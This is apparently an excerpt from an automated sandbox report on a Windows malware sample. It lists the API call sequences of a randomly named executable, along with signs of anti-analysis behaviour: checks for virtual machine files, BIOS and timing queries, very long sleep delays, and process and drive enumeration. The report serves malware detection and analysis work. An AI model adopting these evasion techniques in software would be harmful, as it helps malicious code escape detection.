Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,29_2_012A7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,29_2_012A3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,29_2_012BCE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,29_2_012A1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,29_2_012C1690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,31_2_01111170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,31_2_0111D970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,31_2_01132B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,31_2_01132BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,31_2_011325C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,31_2_0112ADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,31_2_01131460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,31_2_01133CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,31_2_01125720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,31_2_01133F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,31_2_01117FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,31_2_01113610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,31_2_0112CE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,31_2_01111660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,31_2_01131690
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,33_2_01306CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,33_2_012F1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,33_2_012FD970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,33_2_01312B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,33_2_01312BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,33_2_0130ADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,33_2_013125C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,33_2_01311460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,33_2_01313CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,33_2_01305720
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,33_2_01313F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,33_2_012F7FD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,33_2_0130CE10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,33_2_012F3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,33_2_012F1660
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,33_2_01311690
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Evasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcess (graph_1-30506)
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode (graph_1-30539)
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\apppatch\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe File opened / queried: C:\Users\user\Desktop\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\system\vmhgfs.DLL
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exe Code function: 1_2_00401B20 rdtsc
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,22_2_012F78A0
Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 953
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,22_2_012F79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015A79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,25_2_015A79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AF79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,27_2_00AF79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012B79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,29_2_012B79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_011279D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,31_2_011279D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_013079D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,33_2_013079D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe API coverage: 2.2 %
Source: C:\Windows\apppatch\svchost.exe TID: 8076 Thread sleep count: 953 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 8076 Thread sleep time: -95300s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 4524 Thread sleep count: 139 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 6200 Thread sleep count: 140 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 7912 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FD120
